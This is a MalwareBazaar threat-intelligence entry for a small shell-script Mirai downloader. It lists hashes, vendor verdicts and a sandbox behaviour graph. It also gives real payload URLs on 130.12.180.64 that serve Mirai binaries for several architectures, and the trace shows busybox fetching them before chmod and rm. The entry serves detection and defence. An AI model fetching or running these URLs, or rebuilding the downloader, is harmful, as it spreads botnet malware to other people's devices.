MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 206182c1a774d08c201d4d46eeb9b54888a61f8611c722ef16ebd19e14d737aa. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry


Mirai


Vendor detections: 6


Intelligence 6 IOCs YARA File information Comments
Download sample Add tag Delete this sample Report a False Positive

SHA256 hash: 206182c1a774d08c201d4d46eeb9b54888a61f8611c722ef16ebd19e14d737aa
SHA3-384 hash: eae70751e0ca6492920db55acabdb3be062a90270d9c39641eb1a68cd0ba9c18144e1356cd4a495580494158f7c6921a
SHA1 hash: 1db7bf0dae2fa6643e840d7d71b7acfbc87ca830
MD5 hash: 2bce6b909e160b5a7bd97ff719c45c8c
humanhash: mississippi-nineteen-paris-vermont
File name:f
Download: download sample
Signature Mirai
Create hunting rule
File size:831 bytes
First seen:2025-12-21 15:13:54 UTC
Last seen:Never
File type: sh
MIME type:text/plain
ssdeep 24:/iCZOi9k933v6gOTgO9k933v671k933v6gdgnk933v6XOSk933v67T79k933vXw:ZZTk92k9Wk9Ak9ok9Kk9Pw
TLSH T13601ACCF10446D342DC845B93AD3541D58404AE236E4461DADDF857358C56187BBCE6C
Magika txt
Reporter abuse_ch
Tags:sh
URLMalware sample (SHA256 hash)SignatureTags
http://130.12.180.64/jklmips67a7a0f8fc730923427afee83ea893b0f20779e37eeeaf88065ec1208bacefcc Miraielf mirai ua-wget
http://130.12.180.64/jklmpslc3368dbe8c72d6b562974c6aa1c5a3642e0f47ebc4d79888824c8d71b5fcabfa Miraielf mirai ua-wget
http://130.12.180.64/jklarm76cef13d393b6a2d6b81ce5ce644536b2d77edc858a36b5aa3c45645e90b47bb Miraielf mirai
http://130.12.180.64/jklarm5f95187f0489f498c932ec698245e824170ca97d28405bf984fd89e9bb8488ff6 Miraielf mirai ua-wget
http://130.12.180.64/jklarm764fcab57c878f909ecbefdb13bc62c66db16a4b0e858f723844a70019a913d6b Miraielf mirai
http://130.12.180.64/jklarm6ac713128acaa4ac62947c969c4fbb1b6c0707c99c1cb81328256f832483768b3 Miraielf mirai ua-wget

Intelligence

File Origin
# of uploads :
1
# of downloads :
38
Origin country :
DE DE
Vendor Threat Intelligence
No detections
Verdict:
Malicious
Threat level:
  10/10
Confidence:
100%
Tags:
busybox evasive mirai
Link:
https://www.filescan.io/uploads/6948133c5ceddcfa3ff6450f/reports/bcd4d9c9-49bc-4b98-8020-68fd626dda5b/overview
Verdict:
Unknown
Link:
https://www.hybrid-analysis.com/sample/206182c1a774d08c201d4d46eeb9b54888a61f8611c722ef16ebd19e14d737aa
Verdict:
Malicious
File Type:
text
First seen:
2025-12-21T12:37:00Z UTC
Last seen:
2025-12-22T10:29:00Z UTC
Hits:
~10
Link:
https://opentip.kaspersky.com/206182c1a774d08c201d4d46eeb9b54888a61f8611c722ef16ebd19e14d737aa/results?tab=lookup
Status:
terminated
Link:
https://sandbox.kunai.rocks/analysis/97daa56c-676b-4ea9-b6a4-3f6d6f254e24
Behavior Graph:
Download SVG
%3 guuid=3fbab8be-1b00-0000-1dfa-3346c30a0000 pid=2755 /usr/bin/sudo guuid=efbdf2c1-1b00-0000-1dfa-3346ca0a0000 pid=2762 /tmp/sample.bin guuid=3fbab8be-1b00-0000-1dfa-3346c30a0000 pid=2755->guuid=efbdf2c1-1b00-0000-1dfa-3346ca0a0000 pid=2762 execve guuid=209e55c2-1b00-0000-1dfa-3346cc0a0000 pid=2764 /usr/bin/cp guuid=efbdf2c1-1b00-0000-1dfa-3346ca0a0000 pid=2762->guuid=209e55c2-1b00-0000-1dfa-3346cc0a0000 pid=2764 execve guuid=6f97a7c8-1b00-0000-1dfa-3346d30a0000 pid=2771 /usr/bin/dash guuid=efbdf2c1-1b00-0000-1dfa-3346ca0a0000 pid=2762->guuid=6f97a7c8-1b00-0000-1dfa-3346d30a0000 pid=2771 clone guuid=3f4eb1cc-1b00-0000-1dfa-3346da0a0000 pid=2778 /usr/bin/chmod guuid=efbdf2c1-1b00-0000-1dfa-3346ca0a0000 pid=2762->guuid=3f4eb1cc-1b00-0000-1dfa-3346da0a0000 pid=2778 execve guuid=de5ef7cc-1b00-0000-1dfa-3346dc0a0000 pid=2780 /usr/bin/dash guuid=efbdf2c1-1b00-0000-1dfa-3346ca0a0000 pid=2762->guuid=de5ef7cc-1b00-0000-1dfa-3346dc0a0000 pid=2780 clone guuid=647985ce-1b00-0000-1dfa-3346e10a0000 pid=2785 /usr/bin/rm delete-file guuid=efbdf2c1-1b00-0000-1dfa-3346ca0a0000 pid=2762->guuid=647985ce-1b00-0000-1dfa-3346e10a0000 pid=2785 execve guuid=1093d4ce-1b00-0000-1dfa-3346e20a0000 pid=2786 /usr/bin/dash guuid=efbdf2c1-1b00-0000-1dfa-3346ca0a0000 pid=2762->guuid=1093d4ce-1b00-0000-1dfa-3346e20a0000 pid=2786 clone guuid=9066a8d2-1b00-0000-1dfa-3346ec0a0000 pid=2796 /usr/bin/chmod guuid=efbdf2c1-1b00-0000-1dfa-3346ca0a0000 pid=2762->guuid=9066a8d2-1b00-0000-1dfa-3346ec0a0000 pid=2796 execve guuid=a353f5d2-1b00-0000-1dfa-3346ed0a0000 pid=2797 /usr/bin/dash guuid=efbdf2c1-1b00-0000-1dfa-3346ca0a0000 pid=2762->guuid=a353f5d2-1b00-0000-1dfa-3346ed0a0000 pid=2797 clone guuid=e919c2d3-1b00-0000-1dfa-3346f10a0000 pid=2801 /usr/bin/rm delete-file guuid=efbdf2c1-1b00-0000-1dfa-3346ca0a0000 pid=2762->guuid=e919c2d3-1b00-0000-1dfa-3346f10a0000 pid=2801 execve guuid=a9d020d4-1b00-0000-1dfa-3346f20a0000 pid=2802 /usr/bin/dash guuid=efbdf2c1-1b00-0000-1dfa-3346ca0a0000 pid=2762->guuid=a9d020d4-1b00-0000-1dfa-3346f20a0000 pid=2802 clone guuid=e0d87cd7-1b00-0000-1dfa-3346fa0a0000 pid=2810 /usr/bin/chmod guuid=efbdf2c1-1b00-0000-1dfa-3346ca0a0000 pid=2762->guuid=e0d87cd7-1b00-0000-1dfa-3346fa0a0000 pid=2810 execve guuid=ab17c7d7-1b00-0000-1dfa-3346fc0a0000 pid=2812 /usr/bin/dash guuid=efbdf2c1-1b00-0000-1dfa-3346ca0a0000 pid=2762->guuid=ab17c7d7-1b00-0000-1dfa-3346fc0a0000 pid=2812 clone guuid=358391d8-1b00-0000-1dfa-3346fe0a0000 pid=2814 /usr/bin/rm delete-file guuid=efbdf2c1-1b00-0000-1dfa-3346ca0a0000 pid=2762->guuid=358391d8-1b00-0000-1dfa-3346fe0a0000 pid=2814 execve guuid=116be6d8-1b00-0000-1dfa-3346ff0a0000 pid=2815 /usr/bin/dash guuid=efbdf2c1-1b00-0000-1dfa-3346ca0a0000 pid=2762->guuid=116be6d8-1b00-0000-1dfa-3346ff0a0000 pid=2815 clone guuid=d91465dc-1b00-0000-1dfa-3346060b0000 pid=2822 /usr/bin/chmod guuid=efbdf2c1-1b00-0000-1dfa-3346ca0a0000 pid=2762->guuid=d91465dc-1b00-0000-1dfa-3346060b0000 pid=2822 execve guuid=544ebbdc-1b00-0000-1dfa-3346080b0000 pid=2824 /usr/bin/dash guuid=efbdf2c1-1b00-0000-1dfa-3346ca0a0000 pid=2762->guuid=544ebbdc-1b00-0000-1dfa-3346080b0000 pid=2824 clone guuid=2701aadd-1b00-0000-1dfa-33460b0b0000 pid=2827 /usr/bin/rm delete-file guuid=efbdf2c1-1b00-0000-1dfa-3346ca0a0000 pid=2762->guuid=2701aadd-1b00-0000-1dfa-33460b0b0000 pid=2827 execve guuid=ac8e04de-1b00-0000-1dfa-33460c0b0000 pid=2828 /usr/bin/dash guuid=efbdf2c1-1b00-0000-1dfa-3346ca0a0000 pid=2762->guuid=ac8e04de-1b00-0000-1dfa-33460c0b0000 pid=2828 clone guuid=be24cde1-1b00-0000-1dfa-3346180b0000 pid=2840 /usr/bin/chmod guuid=efbdf2c1-1b00-0000-1dfa-3346ca0a0000 pid=2762->guuid=be24cde1-1b00-0000-1dfa-3346180b0000 pid=2840 execve guuid=3afd0fe2-1b00-0000-1dfa-3346190b0000 pid=2841 /usr/bin/dash guuid=efbdf2c1-1b00-0000-1dfa-3346ca0a0000 pid=2762->guuid=3afd0fe2-1b00-0000-1dfa-3346190b0000 pid=2841 clone guuid=293191e2-1b00-0000-1dfa-33461d0b0000 pid=2845 /usr/bin/rm delete-file guuid=efbdf2c1-1b00-0000-1dfa-3346ca0a0000 pid=2762->guuid=293191e2-1b00-0000-1dfa-33461d0b0000 pid=2845 execve guuid=5d81d2e2-1b00-0000-1dfa-33461f0b0000 pid=2847 /usr/bin/dash guuid=efbdf2c1-1b00-0000-1dfa-3346ca0a0000 pid=2762->guuid=5d81d2e2-1b00-0000-1dfa-33461f0b0000 pid=2847 clone guuid=c1c878e6-1b00-0000-1dfa-3346290b0000 pid=2857 /usr/bin/chmod guuid=efbdf2c1-1b00-0000-1dfa-3346ca0a0000 pid=2762->guuid=c1c878e6-1b00-0000-1dfa-3346290b0000 pid=2857 execve guuid=3eaeb5e6-1b00-0000-1dfa-33462b0b0000 pid=2859 /usr/bin/dash guuid=efbdf2c1-1b00-0000-1dfa-3346ca0a0000 pid=2762->guuid=3eaeb5e6-1b00-0000-1dfa-33462b0b0000 pid=2859 clone guuid=97c341e7-1b00-0000-1dfa-33462e0b0000 pid=2862 /usr/bin/rm delete-file guuid=efbdf2c1-1b00-0000-1dfa-3346ca0a0000 pid=2762->guuid=97c341e7-1b00-0000-1dfa-33462e0b0000 pid=2862 execve guuid=827182e7-1b00-0000-1dfa-33462f0b0000 pid=2863 /usr/bin/rm delete-file guuid=efbdf2c1-1b00-0000-1dfa-3346ca0a0000 pid=2762->guuid=827182e7-1b00-0000-1dfa-33462f0b0000 pid=2863 execve guuid=ac51c0c8-1b00-0000-1dfa-3346d40a0000 pid=2772 /usr/bin/busybox net send-data write-file guuid=6f97a7c8-1b00-0000-1dfa-3346d30a0000 pid=2771->guuid=ac51c0c8-1b00-0000-1dfa-3346d40a0000 pid=2772 execve f22fee75-ab34-540d-95fe-696883c6f4ad 130.12.180.64:80 guuid=ac51c0c8-1b00-0000-1dfa-3346d40a0000 pid=2772->f22fee75-ab34-540d-95fe-696883c6f4ad send: 83B guuid=f61de6ce-1b00-0000-1dfa-3346e30a0000 pid=2787 /usr/bin/busybox net send-data write-file guuid=1093d4ce-1b00-0000-1dfa-3346e20a0000 pid=2786->guuid=f61de6ce-1b00-0000-1dfa-3346e30a0000 pid=2787 execve guuid=f61de6ce-1b00-0000-1dfa-3346e30a0000 pid=2787->f22fee75-ab34-540d-95fe-696883c6f4ad send: 83B guuid=8b8f37d4-1b00-0000-1dfa-3346f40a0000 pid=2804 /usr/bin/busybox net send-data write-file guuid=a9d020d4-1b00-0000-1dfa-3346f20a0000 pid=2802->guuid=8b8f37d4-1b00-0000-1dfa-3346f40a0000 pid=2804 execve guuid=8b8f37d4-1b00-0000-1dfa-3346f40a0000 pid=2804->f22fee75-ab34-540d-95fe-696883c6f4ad send: 82B guuid=d428f8d8-1b00-0000-1dfa-3346010b0000 pid=2817 /usr/bin/busybox net send-data write-file guuid=116be6d8-1b00-0000-1dfa-3346ff0a0000 pid=2815->guuid=d428f8d8-1b00-0000-1dfa-3346010b0000 pid=2817 execve guuid=d428f8d8-1b00-0000-1dfa-3346010b0000 pid=2817->f22fee75-ab34-540d-95fe-696883c6f4ad send: 83B guuid=710611de-1b00-0000-1dfa-33460d0b0000 pid=2829 /usr/bin/busybox net send-data write-file guuid=ac8e04de-1b00-0000-1dfa-33460c0b0000 pid=2828->guuid=710611de-1b00-0000-1dfa-33460d0b0000 pid=2829 execve guuid=710611de-1b00-0000-1dfa-33460d0b0000 pid=2829->f22fee75-ab34-540d-95fe-696883c6f4ad send: 83B guuid=2a16e7e2-1b00-0000-1dfa-3346200b0000 pid=2848 /usr/bin/busybox net send-data write-file guuid=5d81d2e2-1b00-0000-1dfa-33461f0b0000 pid=2847->guuid=2a16e7e2-1b00-0000-1dfa-3346200b0000 pid=2848 execve guuid=2a16e7e2-1b00-0000-1dfa-3346200b0000 pid=2848->f22fee75-ab34-540d-95fe-696883c6f4ad send: 83B
Score:
100%
Verdict:
Malware
File Type:
SCRIPT
Link:
https://malprob.io/report/206182c1a774d08c201d4d46eeb9b54888a61f8611c722ef16ebd19e14d737aa
Detection:
n/a
Link:
https://mwdb.cert.pl/sample/206182c1a774d08c201d4d46eeb9b54888a61f8611c722ef16ebd19e14d737aa/
Threat name:
Linux.Downloader.Generic
Create hunting rule
Status:
Suspicious
First seen:
2025-12-21 15:33:23 UTC
File Type:
Text (Shell)
AV detection:
10 of 24 (41.67%)
Threat level:
  3/5
Detection(s):
Suspicious file
Link:
https://check.spamhaus.org/check/?searchterm=ebqyfqnhotiiyia5jvdo5onvjcekmh4gchdsf3yw5piz4fgxg6va._file
Result
Malware family:
n/a
Score:
  3/10
Tags:
n/a
Link:
https://tria.ge/reports/251223-lmksbssjgw/
Behaviour
Modifies registry class
Suspicious use of SetWindowsHookEx
Enumerates physical storage devices
Please note that we are no longer able to provide a coverage score for Virus Total.
Threat name:
Legit
Score:
0.00
Link:
https://yomi.yoroi.company/submissions/206182c1a774d08c201d4d46eeb9b54888a61f8611c722ef16ebd19e14d737aa

File information

The table below shows additional information about this malware sample such as delivery method and external references.

Web download

Mirai

sh 206182c1a774d08c201d4d46eeb9b54888a61f8611c722ef16ebd19e14d737aa

(this sample)

Mirai

elf 67a7a0f8fc730923427afee83ea893b0f20779e37eeeaf88065ec1208bacefcc

  
URLhaus
https://urlhaus.abuse.ch/url/3739318/
  
Delivery method
Distributed via web download
  
Dropping
MD5 2745918b9a55fe21643f5750a33ff0c7
  
Dropping
SHA256 67a7a0f8fc730923427afee83ea893b0f20779e37eeeaf88065ec1208bacefcc

Comments